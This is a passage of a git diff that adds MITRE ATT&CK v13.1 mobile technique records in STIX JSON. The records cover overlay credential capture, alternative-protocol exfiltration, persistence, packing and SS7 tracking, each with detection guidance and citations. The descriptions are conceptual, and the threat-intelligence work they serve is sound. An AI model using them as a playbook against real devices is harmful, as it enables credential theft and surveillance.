Clicking on the device notification could trigger the malicious application to display an input prompt.(Citation: Group IB Gustuff Mar 2019)", + "modified": "2022-04-05T19:52:32.190Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "name": "Input Prompt", + "x_mitre_detection": "The user can view and manage which applications hold the SYSTEM_ALERT_WINDOW permission to create overlay windows on top of other apps through the device settings in Apps & notifications -> Special app access -> Display over other apps (the exact menu location may vary between Android versions).", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-mobile-attack", + "phase_name": "credential-access" + } + ], + "x_mitre_is_subtechnique": false, + "x_mitre_tactic_type": [ + "Post-Adversary Device Access" + ], + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/mobile-attack/attack-pattern/attack-pattern--3e091a89-a493-4a6c-8e88-d57be19bb98d.json b/cti-ATT-CK-v13.1/mobile-attack/attack-pattern/attack-pattern--3e091a89-a493-4a6c-8e88-d57be19bb98d.json new file mode 100644 index 0000000000000000000000000000000000000000..8f91c8f8a2d5b384762e57db46068a3739ad4ff4 --- /dev/null +++ b/cti-ATT-CK-v13.1/mobile-attack/attack-pattern/attack-pattern--3e091a89-a493-4a6c-8e88-d57be19bb98d.json 
@@ -0,0 +1,54 @@ +{ + "type": "bundle", + "id": "bundle--c15e415b-3faa-4629-ab16-cf7b7eb0a0d3", + "spec_version": "2.0", + "objects": [ + { + "x_mitre_platforms": [ + "Android", + "iOS" + ], + "x_mitre_domains": [ + "mobile-attack" + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "type": "attack-pattern", + "id": "attack-pattern--3e091a89-a493-4a6c-8e88-d57be19bb98d", + "created": "2022-04-06T13:19:33.785Z", + "x_mitre_version": "1.0", + "external_references": [ + { + "source_name": "mitre-attack", + "external_id": "T1639", + "url": "https://attack.mitre.org/techniques/T1639" + }, + { + "url": "https://pages.nist.gov/mobile-threat-catalogue/application-threats/APP-30.html", + "source_name": "NIST Mobile Threat Catalogue", + "external_id": "APP-30" + } + ], + "x_mitre_deprecated": false, + "revoked": false, + "description": "Adversaries may steal data by exfiltrating it over a different protocol than that of the existing command and control channel. The data may also be sent to an alternate network location from the main command and control server. \n\nAlternate protocols include FTP, SMTP, HTTP/S, DNS, SMB, or any other network protocol not being used as the main command and control channel. Different protocol channels could also include Web services such as cloud storage. Adversaries may opt to also encrypt and/or obfuscate these alternate channels. 
", + "modified": "2022-04-29T17:29:00.038Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "name": "Exfiltration Over Alternative Protocol", + "x_mitre_detection": "Exfiltration Over Alternative Protocols can be difficult to detect, and therefore enterprises may be better served focusing on detection at other stages of adversarial behavior.", + "kill_chain_phases": [ + { + "phase_name": "exfiltration", + "kill_chain_name": "mitre-mobile-attack" + } + ], + "x_mitre_is_subtechnique": false, + "x_mitre_tactic_type": [ + "Post-Adversary Device Access" + ], + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/mobile-attack/attack-pattern/attack-pattern--45dcbc83-4abc-4de1-b643-e528d1e9df09.json b/cti-ATT-CK-v13.1/mobile-attack/attack-pattern/attack-pattern--45dcbc83-4abc-4de1-b643-e528d1e9df09.json new file mode 100644 index 0000000000000000000000000000000000000000..e1c78a15243150719f71dc7bf26dffdcaf0440f4 --- /dev/null +++ b/cti-ATT-CK-v13.1/mobile-attack/attack-pattern/attack-pattern--45dcbc83-4abc-4de1-b643-e528d1e9df09.json @@ -0,0 +1,27 @@ +{ + "type": "bundle", + "id": "bundle--c344b53e-edd5-41ae-9969-5ae74cdf6e9d", + "spec_version": "2.0", + "objects": [ + { + "x_mitre_domains": [ + "mobile-attack" + ], + "id": "attack-pattern--45dcbc83-4abc-4de1-b643-e528d1e9df09", + "type": "attack-pattern", + "created": "2017-10-25T14:48:24.069Z", + "revoked": true, + "external_references": [ + { + "source_name": "mitre-mobile-attack", + "url": "https://attack.mitre.org/techniques/T1460", + "external_id": "T1460" + } + ], + "modified": "2018-10-17T01:05:10.703Z", + "name": "Biometric Spoofing", + "x_mitre_version": "1.0", + "x_mitre_is_subtechnique": false + } + ] +} \ No newline at end of file 
diff --git a/cti-ATT-CK-v13.1/mobile-attack/attack-pattern/attack-pattern--46d818a5-67fa-4585-a7fc-ecf15376c8d5.json b/cti-ATT-CK-v13.1/mobile-attack/attack-pattern/attack-pattern--46d818a5-67fa-4585-a7fc-ecf15376c8d5.json new file mode 100644 index 0000000000000000000000000000000000000000..6a3ed0f3619ea062122306469fec6afdb3212bf8 --- /dev/null +++ b/cti-ATT-CK-v13.1/mobile-attack/attack-pattern/attack-pattern--46d818a5-67fa-4585-a7fc-ecf15376c8d5.json 
@@ -0,0 +1,64 @@ +{ + "type": "bundle", + "id": "bundle--50ec704b-6666-4888-91bb-fc0b35b48313", + "spec_version": "2.0", + "objects": [ + { + "modified": "2023-03-16T18:26:46.043Z", + "name": "Boot or Logon Initialization Scripts", + "description": "Adversaries may use scripts automatically executed at boot or logon initialization to establish persistence. Initialization scripts are part of the underlying operating system and are not accessible to the user unless the device has been rooted or jailbroken. ", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-mobile-attack", + "phase_name": "persistence" + } + ], + "x_mitre_deprecated": false, + "x_mitre_detection": "On Android, Verified Boot can detect unauthorized modifications to the system partition.(Citation: Android-VerifiedBoot) Android's SafetyNet API provides remote attestation capabilities, which could potentially be used to identify and respond to compromise devices. Samsung Knox provides a similar remote attestation capability on supported Samsung devices. ", + "x_mitre_domains": [ + "mobile-attack" + ], + "x_mitre_is_subtechnique": false, + "x_mitre_platforms": [ + "Android", + "iOS" + ], + "x_mitre_version": "2.1", + "x_mitre_tactic_type": [ + "Post-Adversary Device Access" + ], + "type": "attack-pattern", + "id": "attack-pattern--46d818a5-67fa-4585-a7fc-ecf15376c8d5", + "created": "2017-10-25T14:48:31.294Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/techniques/T1398", + "external_id": "T1398" + }, + { + "source_name": "Android-VerifiedBoot", + "description": "Android. (n.d.). Verified Boot. 
Retrieved December 21, 2016.", + "url": "https://source.android.com/security/verifiedboot/" + }, + { + "source_name": "NIST Mobile Threat Catalogue", + "url": "https://pages.nist.gov/mobile-threat-catalogue/application-threats/APP-26.html", + "external_id": "APP-26" + }, + { + "source_name": "NIST Mobile Threat Catalogue", + "url": "https://pages.nist.gov/mobile-threat-catalogue/application-threats/APP-27.html", + "external_id": "APP-27" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_attack_spec_version": "3.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/mobile-attack/attack-pattern/attack-pattern--498e7b81-238d-404c-aa5e-332904d63286.json b/cti-ATT-CK-v13.1/mobile-attack/attack-pattern/attack-pattern--498e7b81-238d-404c-aa5e-332904d63286.json new file mode 100644 index 0000000000000000000000000000000000000000..6769cee15356674c535fc052de08f6f39ca71ad3 --- /dev/null +++ b/cti-ATT-CK-v13.1/mobile-attack/attack-pattern/attack-pattern--498e7b81-238d-404c-aa5e-332904d63286.json 
@@ -0,0 +1,54 @@
+{
+ "type": "bundle",
+ "id": "bundle--2c92a035-b376-4916-9a8e-a6be05d0ad78",
+ "spec_version": "2.0",
+ "objects": [
+ {
+ "modified": "2023-03-20T18:44:26.317Z",
+ "name": "Execution Guardrails",
+ "description": "Adversaries may use execution guardrails to constrain execution or actions based on adversary supplied and environment specific conditions that are expected to be present on the target. Guardrails ensure that a payload only executes against an intended target and reduces collateral damage from an adversary\u2019s campaign. Values an adversary can provide about a target system or environment to use as guardrails may include environment information such as location.(Citation: SWB Exodus March 2019)\n\nGuardrails can be used to prevent exposure of capabilities in environments that are not intended to be compromised or operated within. This use of guardrails is distinct from typical [System Checks](https://attack.mitre.org/techniques/T1633/001). While use of [System Checks](https://attack.mitre.org/techniques/T1633/001) may involve checking for known sandbox values and continuing with execution only if there is no match, the use of guardrails will involve checking for an expected target-specific value and only continuing with execution if there is such a match.",
+ "kill_chain_phases": [
+ {
+ "kill_chain_name": "mitre-mobile-attack",
+ "phase_name": "defense-evasion"
+ }
+ ],
+ "x_mitre_deprecated": false,
+ "x_mitre_detection": "Detecting the use of guardrails may be difficult depending on the implementation. Users can review which applications have location and sensitive phone information permissions in the operating system\u2019s settings menu. Application vetting services can detect unnecessary and potentially permissions or API calls.",
+ "x_mitre_domains": [
+ "mobile-attack"
+ ],
+ "x_mitre_is_subtechnique": false,
+ "x_mitre_platforms": [
+ "Android",
+ "iOS"
+ ],
+ "x_mitre_version": "1.1",
+ "x_mitre_tactic_type": [
+ "Post-Adversary Device Access"
+ ],
+ "type": "attack-pattern",
+ "id": "attack-pattern--498e7b81-238d-404c-aa5e-332904d63286",
+ "created": "2022-03-30T20:31:16.624Z",
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "revoked": false,
+ "external_references": [
+ {
+ "source_name": "mitre-attack",
+ "url": "https://attack.mitre.org/techniques/T1627",
+ "external_id": "T1627"
+ },
+ {
+ "source_name": "SWB Exodus March 2019",
+ "description": "Security Without Borders. (2019, March 29). Exodus: New Android Spyware Made in Italy. Retrieved September 3, 2019.",
+ "url": "https://securitywithoutborders.org/blog/2019/03/29/exodus.html"
+ }
+ ],
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "x_mitre_attack_spec_version": "3.1.0",
+ "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5"
+ }
+ ]
+}
\ No newline at end of file
diff --git a/cti-ATT-CK-v13.1/mobile-attack/attack-pattern/attack-pattern--4c58b7c6-a839-4789-bda9-9de33e4d4512.json b/cti-ATT-CK-v13.1/mobile-attack/attack-pattern/attack-pattern--4c58b7c6-a839-4789-bda9-9de33e4d4512.json
new file mode 100644
index 0000000000000000000000000000000000000000..b2834bfcbaadbc58afeed599cd8e337fde62f5b2
--- /dev/null
+++ b/cti-ATT-CK-v13.1/mobile-attack/attack-pattern/attack-pattern--4c58b7c6-a839-4789-bda9-9de33e4d4512.json
@@ -0,0 +1,108 @@
+{
+ "type": "bundle",
+ "id": "bundle--3f75ef21-2ca3-4e52-bc2a-c39b26f6d60e",
+ "spec_version": "2.0",
+ "objects": [
+ {
+ "modified": "2023-03-20T18:55:51.676Z",
+ "name": "GUI Input Capture",
+ "description": "Adversaries may mimic common operating system GUI components to prompt users for sensitive information with a seemingly legitimate prompt. The operating system and installed applications often have legitimate needs to prompt the user for sensitive information such as account credentials, bank account information, or Personally Identifiable Information (PII). Compared to traditional PCs, the constrained display size of mobile devices may impair the ability to provide users with contextual information, making users more susceptible to this technique\u2019s use.(Citation: Felt-PhishingOnMobileDevices)\n\nThere are several approaches adversaries may use to mimic this functionality. Adversaries may impersonate the identity of a legitimate application (e.g. use the same application name and/or icon) and, when installed on the device, may prompt the user for sensitive information.(Citation: eset-finance) Adversaries may also send fake device notifications to the user that may trigger the display of an input prompt when clicked.(Citation: Group IB Gustuff Mar 2019) \n\nAdditionally, adversaries may display a prompt on top of a running, legitimate application to trick users into entering sensitive information into a malicious application rather than the legitimate application. Typically, adversaries need to know when the targeted application and the individual activity within the targeted application is running in the foreground to display the prompt at the proper time. Adversaries can abuse Android\u2019s accessibility features to determine which application is currently in the foreground.(Citation: ThreatFabric Cerberus) Two known approaches to displaying a prompt include:\n\n* Adversaries start a new activity on top of a running legitimate application.(Citation: Felt-PhishingOnMobileDevices)(Citation: Hassell-ExploitingAndroid) Android 10 places new restrictions on the ability for an application to start a new activity on top of another application, which may make it more difficult for adversaries to utilize this technique.(Citation: Android Background)\n* Adversaries create an application overlay window on top of a running legitimate application. Applications must hold the `SYSTEM_ALERT_WINDOW` permission to create overlay windows. This permission is handled differently than typical Android permissions and, at least under certain conditions, is automatically granted to applications installed from the Google Play Store.(Citation: Cloak and Dagger)(Citation: NowSecure Android Overlay)(Citation: Skycure-Accessibility) The `SYSTEM_ALERT_WINDOW` permission and its associated ability to create application overlay windows are expected to be deprecated in a future release of Android in favor of a new API.(Citation: XDA Bubbles)",
+ "kill_chain_phases": [
+ {
+ "kill_chain_name": "mitre-mobile-attack",
+ "phase_name": "credential-access"
+ },
+ {
+ "kill_chain_name": "mitre-mobile-attack",
+ "phase_name": "collection"
+ }
+ ],
+ "x_mitre_deprecated": false,
+ "x_mitre_detection": "Android users can view and manage which applications hold the `SYSTEM_ALERT_WINDOW` permission through the device settings in Apps & notifications -> Special app access -> Display over other apps (the exact menu location may vary between Android versions). \n\nApplication vetting services can look for applications requesting the `android.permission.SYSTEM_ALERT_WINDOW` permission in the list of permissions in the app manifest. ",
+ "x_mitre_domains": [
+ "mobile-attack"
+ ],
+ "x_mitre_is_subtechnique": true,
+ "x_mitre_platforms": [
+ "Android",
+ "iOS"
+ ],
+ "x_mitre_version": "1.1",
+ "x_mitre_tactic_type": [
+ "Post-Adversary Device Access"
+ ],
+ "type": "attack-pattern",
+ "id": "attack-pattern--4c58b7c6-a839-4789-bda9-9de33e4d4512",
+ "created": "2022-04-05T19:48:31.195Z",
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "revoked": false,
+ "external_references": [
+ {
+ "source_name": "mitre-attack",
+ "url": "https://attack.mitre.org/techniques/T1417/002",
+ "external_id": "T1417.002"
+ },
+ {
+ "source_name": "Felt-PhishingOnMobileDevices",
+ "description": "A.P. Felt and D. Wagner. (2011, May 26). Phishing on Mobile Devices. Retrieved August 25, 2016.",
+ "url": "http://w2spconf.com/2011/papers/felt-mobilephishing.pdf"
+ },
+ {
+ "source_name": "Android Background",
+ "description": "Android Developers. (n.d.). Restrictions on starting activities from the background. Retrieved September 18, 2019.",
+ "url": "https://developer.android.com/guide/components/activities/background-starts"
+ },
+ {
+ "source_name": "Cloak and Dagger",
+ "description": "Fratantonio, Y., et al.. (2017). Cloak & Dagger. Retrieved September 18, 2019.",
+ "url": "http://cloak-and-dagger.org/"
+ },
+ {
+ "source_name": "Group IB Gustuff Mar 2019",
+ "description": "Group-IB. (2019, March 28). Group-IB uncovers Android Trojan named \u00abGustuff\u00bb capable of targeting more than 100 global banking apps, cryptocurrency and marketplace applications. Retrieved September 3, 2019.",
+ "url": "https://www.group-ib.com/blog/gustuff"
+ },
+ {
+ "source_name": "eset-finance",
+ "description": "Luk\u00e1\u0161 \u0160tefanko. (2016, July 7). Fake finance apps on Google Play target users from around the world. Retrieved September 24, 2018.",
+ "url": "https://www.welivesecurity.com/2018/09/19/fake-finance-apps-google-play-target-around-world/"
+ },
+ {
+ "source_name": "Hassell-ExploitingAndroid",
+ "description": "R. Hassell. (2011, October 12-13). Exploiting Androids for Fun and Profit. Retrieved October 10, 2019.",
+ "url": "https://conference.hitb.org/hitbsecconf2011kul/materials/D1T1%20-%20Riley%20Hassell%20-%20Exploiting%20Androids%20for%20Fun%20and%20Profit.pdf"
+ },
+ {
+ "source_name": "XDA Bubbles",
+ "description": "Rahman, M.. (2019, May 8). Bubbles in Android Q will fully replace the overlay API in a future Android version. Retrieved September 18, 2019.",
+ "url": "https://www.xda-developers.com/android-q-system-alert-window-deprecate-bubbles/"
+ },
+ {
+ "source_name": "NowSecure Android Overlay",
+ "description": "Ramirez, T.. (2017, May 25). \u2018SAW\u2019-ing through the UI: Android overlay malware and the System Alert Window permission explained. Retrieved September 18, 2019.",
+ "url": "https://www.nowsecure.com/blog/2017/05/25/android-overlay-malware-system-alert-window-permission/"
+ },
+ {
+ "source_name": "ThreatFabric Cerberus",
+ "description": "ThreatFabric. (2019, August). Cerberus - A new banking Trojan from the underworld. Retrieved September 18, 2019.",
+ "url": "https://www.threatfabric.com/blogs/cerberus-a-new-banking-trojan-from-the-underworld.html"
+ },
+ {
+ "source_name": "Skycure-Accessibility",
+ "description": "Yair Amit. (2016, March 3). \u201cAccessibility Clickjacking\u201d \u2013 The Next Evolution in Android Malware that Impacts More Than 500 Million Devices. Retrieved December 21, 2016.",
+ "url": "https://www.skycure.com/blog/accessibility-clickjacking/"
+ },
+ {
+ "source_name": "NIST Mobile Threat Catalogue",
+ "url": "https://pages.nist.gov/mobile-threat-catalogue/application-threats/APP-31.html",
+ "external_id": "APP-31"
+ }
+ ],
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "x_mitre_attack_spec_version": "3.1.0",
+ "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5"
+ }
+ ]
+}
\ No newline at end of file
diff --git a/cti-ATT-CK-v13.1/mobile-attack/attack-pattern/attack-pattern--4e6620ac-c30c-4f6d-918e-fa20cae7c1ce.json b/cti-ATT-CK-v13.1/mobile-attack/attack-pattern/attack-pattern--4e6620ac-c30c-4f6d-918e-fa20cae7c1ce.json
new file mode 100644
index 0000000000000000000000000000000000000000..72e3e189e8462b686a4ef8c0a0ac73543a991bf2
--- /dev/null
+++ b/cti-ATT-CK-v13.1/mobile-attack/attack-pattern/attack-pattern--4e6620ac-c30c-4f6d-918e-fa20cae7c1ce.json
@@ -0,0 +1,54 @@
+{
+ "type": "bundle",
+ "id": "bundle--9b027c7d-ffd3-490f-a683-62853260ce2e",
+ "spec_version": "2.0",
+ "objects": [
+ {
+ "x_mitre_platforms": [
+ "Android",
+ "iOS"
+ ],
+ "x_mitre_domains": [
+ "mobile-attack"
+ ],
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "type": "attack-pattern",
+ "id": "attack-pattern--4e6620ac-c30c-4f6d-918e-fa20cae7c1ce",
+ "created": "2017-10-25T14:48:11.535Z",
+ "x_mitre_version": "1.0",
+ "external_references": [
+ {
+ "source_name": "mitre-attack",
+ "external_id": "T1432",
+ "url": "https://attack.mitre.org/techniques/T1432"
+ },
+ {
+ "url": "https://pages.nist.gov/mobile-threat-catalogue/application-threats/APP-13.html",
+ "source_name": "NIST Mobile Threat Catalogue",
+ "external_id": "APP-13"
+ }
+ ],
+ "x_mitre_deprecated": false,
+ "revoked": true,
+ "description": "An adversary could call standard operating system APIs from a malicious application to gather contact list (i.e., address book) data, or with escalated privileges could directly access files containing contact list data.",
+ "modified": "2022-04-01T13:19:41.180Z",
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "name": "Access Contact List",
+ "x_mitre_detection": "On both Android (6.0 and up) and iOS, the user can view which applications have permission to access contact list information through the device settings screen, and the user can choose to revoke the permissions.",
+ "kill_chain_phases": [
+ {
+ "phase_name": "collection",
+ "kill_chain_name": "mitre-mobile-attack"
+ }
+ ],
+ "x_mitre_is_subtechnique": false,
+ "x_mitre_tactic_type": [
+ "Post-Adversary Device Access"
+ ],
+ "x_mitre_attack_spec_version": "2.1.0",
+ "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5"
+ }
+ ]
+}
\ No newline at end of file
diff --git a/cti-ATT-CK-v13.1/mobile-attack/attack-pattern/attack-pattern--4f14e30b-8b57-4a7b-9093-2c0778ea99cf.json b/cti-ATT-CK-v13.1/mobile-attack/attack-pattern/attack-pattern--4f14e30b-8b57-4a7b-9093-2c0778ea99cf.json
new file mode 100644
index 0000000000000000000000000000000000000000..44fa3b38a822214469da2e8703fa34ef24056129
--- /dev/null
+++ b/cti-ATT-CK-v13.1/mobile-attack/attack-pattern/attack-pattern--4f14e30b-8b57-4a7b-9093-2c0778ea99cf.json
@@ -0,0 +1,59 @@
+{
+ "type": "bundle",
+ "id": "bundle--3c0ecefe-47c9-48f0-83dc-bfc47c10c940",
+ "spec_version": "2.0",
+ "objects": [
+ {
+ "modified": "2023-03-20T15:20:11.752Z",
+ "name": "Compromise Client Software Binary",
+ "description": "Adversaries may modify system software binaries to establish persistent access to devices. System software binaries are used by the underlying operating system and users over adb or terminal emulators. \n\nAdversaries may make modifications to client software binaries to carry out malicious tasks when those binaries are executed. For example, malware may come with a pre-compiled malicious binary intended to overwrite the genuine one on the device. Since these binaries may be routinely executed by the system or user, the adversary can leverage this for persistent access to the device. ",
+ "kill_chain_phases": [
+ {
+ "kill_chain_name": "mitre-mobile-attack",
+ "phase_name": "persistence"
+ }
+ ],
+ "x_mitre_deprecated": false,
+ "x_mitre_detection": "Verified Boot can detect unauthorized modifications to the system partition.(Citation: Android-VerifiedBoot) Android\u2019s SafetyNet API provides remote attestation capabilities, which could potentially be used to identify and respond to compromised devices. Samsung Knox provides a similar remote attestation capability on supported Samsung devices. Application vetting services could detect applications trying to modify files in protected parts of the operating system.",
+ "x_mitre_domains": [
+ "mobile-attack"
+ ],
+ "x_mitre_is_subtechnique": false,
+ "x_mitre_platforms": [
+ "Android",
+ "iOS"
+ ],
+ "x_mitre_version": "1.1",
+ "x_mitre_tactic_type": [
+ "Post-Adversary Device Access"
+ ],
+ "type": "attack-pattern",
+ "id": "attack-pattern--4f14e30b-8b57-4a7b-9093-2c0778ea99cf",
+ "created": "2022-03-30T19:53:27.791Z",
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "revoked": false,
+ "external_references": [
+ {
+ "source_name": "mitre-attack",
+ "url": "https://attack.mitre.org/techniques/T1645",
+ "external_id": "T1645"
+ },
+ {
+ "source_name": "Android-VerifiedBoot",
+ "description": "Android. (n.d.). Verified Boot. Retrieved December 21, 2016.",
+ "url": "https://source.android.com/security/verifiedboot/"
+ },
+ {
+ "source_name": "NIST Mobile Threat Catalogue",
+ "url": "https://pages.nist.gov/mobile-threat-catalogue/application-threats/APP-27.html",
+ "external_id": "APP-27"
+ }
+ ],
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "x_mitre_attack_spec_version": "3.1.0",
+ "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5"
+ }
+ ]
+}
\ No newline at end of file
diff --git a/cti-ATT-CK-v13.1/mobile-attack/attack-pattern/attack-pattern--51636761-2e35-44bf-9e56-e337adf97174.json b/cti-ATT-CK-v13.1/mobile-attack/attack-pattern/attack-pattern--51636761-2e35-44bf-9e56-e337adf97174.json
new file mode 100644
index 0000000000000000000000000000000000000000..25324eafe050a49da2be20a558109dbcf0b11058
--- /dev/null
+++ b/cti-ATT-CK-v13.1/mobile-attack/attack-pattern/attack-pattern--51636761-2e35-44bf-9e56-e337adf97174.json
@@ -0,0 +1,49 @@
+{
+ "type": "bundle",
+ "id": "bundle--068b5f5d-8a4f-401a-8b73-bf99bfd104c8",
+ "spec_version": "2.0",
+ "objects": [
+ {
+ "modified": "2023-03-20T18:54:40.501Z",
+ "name": "Software Packing",
+ "description": "Adversaries may perform software packing to conceal their code. Software packing is a method of compressing or encrypting an executable. Packing an executable changes the file signature in an attempt to avoid signature-based detection. Most decompression techniques decompress the executable code in memory. \n\nUtilities used to perform software packing are called packers. An example packer is FTT. A more comprehensive list of known packers is available, but adversaries may create their own packing techniques that do not leave the same artifacts as well-known packers to evade defenses.",
+ "kill_chain_phases": [
+ {
+ "kill_chain_name": "mitre-mobile-attack",
+ "phase_name": "defense-evasion"
+ }
+ ],
+ "x_mitre_deprecated": false,
+ "x_mitre_detection": "Application vetting services could look for known software packers or artifacts of packing techniques. Packing is not a definitive indicator of malicious activity, because as legitimate software may use packing techniques to reduce binary size or to protect proprietary code.",
+ "x_mitre_domains": [
+ "mobile-attack"
+ ],
+ "x_mitre_is_subtechnique": true,
+ "x_mitre_platforms": [
+ "iOS",
+ "Android"
+ ],
+ "x_mitre_version": "1.1",
+ "x_mitre_tactic_type": [
+ "Post-Adversary Device Access"
+ ],
+ "type": "attack-pattern",
+ "id": "attack-pattern--51636761-2e35-44bf-9e56-e337adf97174",
+ "created": "2022-03-30T19:20:37.864Z",
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "revoked": false,
+ "external_references": [
+ {
+ "source_name": "mitre-attack",
+ "url": "https://attack.mitre.org/techniques/T1406/002",
+ "external_id": "T1406.002"
+ }
+ ],
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "x_mitre_attack_spec_version": "3.1.0",
+ "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5"
+ }
+ ]
+}
\ No newline at end of file
diff --git a/cti-ATT-CK-v13.1/mobile-attack/attack-pattern/attack-pattern--51aedbd6-2837-4d15-aeb0-cb09f2bf22ac.json b/cti-ATT-CK-v13.1/mobile-attack/attack-pattern/attack-pattern--51aedbd6-2837-4d15-aeb0-cb09f2bf22ac.json
new file mode 100644
index 0000000000000000000000000000000000000000..e56f3b4801f91bea824570b28031d4308d0e382c
--- /dev/null
+++ b/cti-ATT-CK-v13.1/mobile-attack/attack-pattern/attack-pattern--51aedbd6-2837-4d15-aeb0-cb09f2bf22ac.json
@@ -0,0 +1,27 @@
+{
+ "type": "bundle",
+ "id": "bundle--5a524082-c610-4933-84f3-1108001e862d",
+ "spec_version": "2.0",
+ "objects": [
+ {
+ "x_mitre_domains": [
+ "mobile-attack"
+ ],
+ "id": "attack-pattern--51aedbd6-2837-4d15-aeb0-cb09f2bf22ac",
+ "type": "attack-pattern",
+ "created": "2017-10-25T14:48:16.288Z",
+ "revoked": true,
+ "external_references": [
+ {
+ "source_name": "mitre-mobile-attack",
+ "url": "https://attack.mitre.org/techniques/T1445",
+ "external_id": "T1445"
+ }
+ ],
+ "modified": "2018-10-17T01:05:10.701Z",
+ "name": "Abuse of iOS Enterprise App Signing Key",
+ "x_mitre_version": "1.0",
+ "x_mitre_is_subtechnique": false
+ }
+ ]
+}
\ No newline at end of file
diff --git a/cti-ATT-CK-v13.1/mobile-attack/attack-pattern/attack-pattern--52651225-0b3a-482d-aa7e-10618fd063b5.json b/cti-ATT-CK-v13.1/mobile-attack/attack-pattern/attack-pattern--52651225-0b3a-482d-aa7e-10618fd063b5.json
new file mode 100644
index 0000000000000000000000000000000000000000..c1d01ce90ce55db18e117388e6b1518bbe2a1fe0
--- /dev/null
+++ b/cti-ATT-CK-v13.1/mobile-attack/attack-pattern/attack-pattern--52651225-0b3a-482d-aa7e-10618fd063b5.json
@@ -0,0 +1,83 @@
+{
+ "type": "bundle",
+ "id": "bundle--869382e9-f57d-49f3-b3ab-0ebd9e39a63c",
+ "spec_version": "2.0",
+ "objects": [
+ {
+ "x_mitre_platforms": [
+ "Android",
+ "iOS"
+ ],
+ "x_mitre_domains": [
+ "mobile-attack"
+ ],
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "type": "attack-pattern",
+ "id": "attack-pattern--52651225-0b3a-482d-aa7e-10618fd063b5",
+ "created": "2017-10-25T14:48:09.864Z",
+ "x_mitre_version": "1.1",
+ "external_references": [
+ {
+ "source_name": "mitre-attack",
+ "external_id": "T1450",
+ "url": "https://attack.mitre.org/techniques/T1450"
+ },
+ {
+ "source_name": "3GPP-Security",
+ "url": "http://www.3gpp.org/ftp/tsg_sa/wg3_security/_specs/33900-120.pdf",
+ "description": "3GPP. (2000, January). A Guide to 3rd Generation Security. Retrieved December 19, 2016."
+ },
+ {
+ "source_name": "CSRIC5-WG10-FinalReport",
+ "url": "https://www.fcc.gov/files/csric5-wg10-finalreport031517pdf",
+ "description": "Communications Security, Reliability, Interoperability Council (CSRIC). (2017, March). Working Group 10 Legacy Systems Risk Reductions Final Report. Retrieved May 24, 2017."
+ },
+ {
+ "source_name": "CSRIC-WG1-FinalReport",
+ "description": "CSRIC-WG1-FinalReport"
+ },
+ {
+ "source_name": "Positive-SS7",
+ "url": "https://www.ptsecurity.com/upload/ptcom/PT-SS7-AD-Data-Sheet-eng.pdf",
+ "description": "Positive Technologies. (n.d.). SS7 Attack Discovery. Retrieved December 19, 2016."
+ },
+ {
+ "source_name": "Engel-SS7-2008",
+ "url": "https://www.youtube.com/watch?v=q0n5ySqbfdI",
+ "description": "Tobias Engel. (2008, December). Locating Mobile Phones using SS7. Retrieved December 19, 2016."
+ },
+ {
+ "source_name": "Engel-SS7",
+ "url": "https://berlin.ccc.de/~tobias/31c3-ss7-locate-track-manipulate.pdf",
+ "description": "Tobias Engel. (2014, December). SS7: Locate. Track. Manipulate.. Retrieved December 19, 2016."
+ },
+ {
+ "url": "https://pages.nist.gov/mobile-threat-catalogue/cellular-threats/CEL-38.html",
+ "source_name": "NIST Mobile Threat Catalogue",
+ "external_id": "CEL-38"
+ }
+ ],
+ "x_mitre_deprecated": false,
+ "revoked": true,
+ "description": "An adversary could exploit signaling system vulnerabilities to track the location of mobile devices. (Citation: Engel-SS7) (Citation: Engel-SS7-2008) (Citation: 3GPP-Security) (Citation: Positive-SS7) (Citation: CSRIC5-WG10-FinalReport)",
+ "modified": "2022-04-05T19:54:12.657Z",
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "name": "Exploit SS7 to Track Device Location",
